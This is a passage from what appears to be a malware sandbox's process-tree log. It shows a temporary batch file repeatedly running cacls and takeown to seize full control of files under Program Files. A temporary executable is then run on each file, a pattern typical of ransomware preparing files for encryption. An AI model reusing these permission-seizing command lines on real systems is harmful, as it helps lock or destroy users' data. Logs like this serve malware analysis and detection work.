C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1540
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT" /E /G Admin:F /C3⤵PID:1736
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1250.TXT"3⤵
- Modifies file permissions
PID:1712
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CP1250.TXT" -nobanner3⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CP1250.TXT" -nobanner4⤵PID:796
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\es-ES\msoeres.dll.mui""2⤵PID:904
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\es-ES\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\es-ES\msoeres.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1216
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1960
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui""2⤵PID:2004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui" /E /G Admin:F /C3⤵PID:848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\de-DE\PhotoAcq.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner3⤵PID:1564
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoAcq.dll.mui" -nobanner4⤵PID:980
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1432
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui""2⤵PID:1744
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1364
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:920
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1168
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""2⤵PID:1088
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C3⤵PID:1180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1108
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner3⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "msoeres.dll.mui" -nobanner4⤵PID:1104
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Mail\WinMail.exe""2⤵PID:1736
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Mail\WinMail.exe" /E /G Admin:F /C3⤵PID:752
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Mail\WinMail.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe" -nobanner3⤵PID:2044
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe" -nobanner4⤵PID:1740
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui""2⤵PID:1620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Windows Photo Viewer\fr-FR\ImagingDevices.exe.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner3⤵PID:904
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "ImagingDevices.exe.mui" -nobanner4⤵PID:552
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui""2⤵PID:848
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui" /E /G Admin:F /C3⤵PID:1216
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\de-DE\Journal.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Journal.exe.mui" -nobanner3⤵PID:1540
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Journal.exe.mui" -nobanner4⤵PID:1204
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui""2⤵PID:692
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:1564
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\PDIALOG.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵PID:1768
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui""2⤵PID:1180
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui" /E /G Admin:F /C3⤵PID:920
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\jnwmon.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2008
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "jnwmon.dll.mui" -nobanner3⤵PID:1764
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "jnwmon.dll.mui" -nobanner4⤵PID:2004
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:320
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""2⤵PID:752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C3⤵PID:848
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"3⤵PID:1740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "RTC.der" -nobanner3⤵PID:680
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "RTC.der" -nobanner4⤵PID:1564
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""2⤵PID:772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C3⤵PID:2044
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"3⤵PID:1168
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "end_review.gif" -nobanner3⤵PID:1984
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "end_review.gif" -nobanner4⤵PID:920
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""2⤵PID:2004
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C3⤵PID:904
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"3⤵PID:996
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "reviews_joined.gif" -nobanner3⤵PID:1364
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "reviews_joined.gif" -nobanner4⤵PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵PID:1736
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:1540
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵PID:808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "server_ok.gif" -nobanner3⤵PID:692
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "server_ok.gif" -nobanner4⤵PID:2044
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1712
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""2⤵PID:1620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"3⤵PID:552
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "warning.gif" -nobanner3⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "warning.gif" -nobanner4⤵PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1624
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""2⤵PID:980
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C3⤵PID:2004
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"3⤵
- Modifies file permissions
PID:1900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "MinionPro-BoldIt.otf" -nobanner3⤵PID:1960
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "MinionPro-BoldIt.otf" -nobanner4⤵PID:1540
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1168
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""2⤵PID:1700
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C3⤵PID:680
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"3⤵
- Modifies file permissions
PID:1424
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "SY______.PFB" -nobanner3⤵PID:1432
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "SY______.PFB" -nobanner4⤵PID:1744
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""2⤵PID:588
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C3⤵PID:1984
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"3⤵
- Modifies file permissions
PID:1000
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "brt.hyp" -nobanner3⤵PID:1764
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "brt.hyp" -nobanner4⤵PID:2004
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""2⤵PID:752
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C3⤵PID:1364
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"3⤵PID:1252
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "eng32.clx" -nobanner3⤵PID:1184
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "eng32.clx" -nobanner4⤵PID:680
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:552
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""2⤵PID:772
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C3⤵PID:692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"3⤵PID:920
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "CENTEURO.TXT" -nobanner3⤵PID:2008
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "CENTEURO.TXT" -nobanner4⤵PID:1984
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1900
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵PID:320
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:1180
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵PID:1588
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "UKRAINE.TXT" -nobanner3⤵PID:1740
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "UKRAINE.TXT" -nobanner4⤵PID:1364
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:300
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui""2⤵PID:680
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui" /E /G Admin:F /C3⤵PID:1168
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\ja-JP\NBMapTIP.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner3⤵PID:1700
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "NBMapTIP.dll.mui" -nobanner4⤵PID:848
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp""2⤵PID:2008
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp" /E /G Admin:F /C3⤵PID:772
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Month_Calendar.jtp"3⤵PID:1496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Month_Calendar.jtp" -nobanner3⤵PID:1180
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Month_Calendar.jtp" -nobanner4⤵PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1364
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui""2⤵PID:1516
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G Admin:F /C3⤵PID:808
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"3⤵PID:1960
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "JNTFiltr.dll.mui" -nobanner3⤵PID:1104
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "JNTFiltr.dll.mui" -nobanner4⤵PID:1100
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:848
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\es-ES\Journal.exe.mui""2⤵PID:1620
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\es-ES\Journal.exe.mui" /E /G Admin:F /C3⤵PID:552
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\es-ES\Journal.exe.mui"3⤵
- Modifies file permissions
PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "Journal.exe.mui" -nobanner3⤵PID:588
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "Journal.exe.mui" -nobanner4⤵PID:1496
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1588
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui""2⤵PID:1740
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui" /E /G Admin:F /C3⤵PID:996
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\fr-FR\PDIALOG.exe.mui"3⤵PID:1540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner3⤵PID:1168
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PDIALOG.exe.mui" -nobanner4⤵PID:1960
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1100
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui""2⤵PID:1700
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:320
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\es-ES\WinMail.exe.mui"3⤵PID:1184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:772
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1252
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1108
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui""2⤵PID:1776
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui" /E /G Admin:F /C3⤵PID:1844
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui"3⤵
- Modifies file permissions
PID:1624
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner3⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula "PhotoViewer.dll.mui" -nobanner4⤵PID:1000
-
-
-
C:\Users\Admin\AppData\Local\Temp\tuXIqMZb.exetuXIqMZb.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:752
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RvjBPTH2.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:2044
-
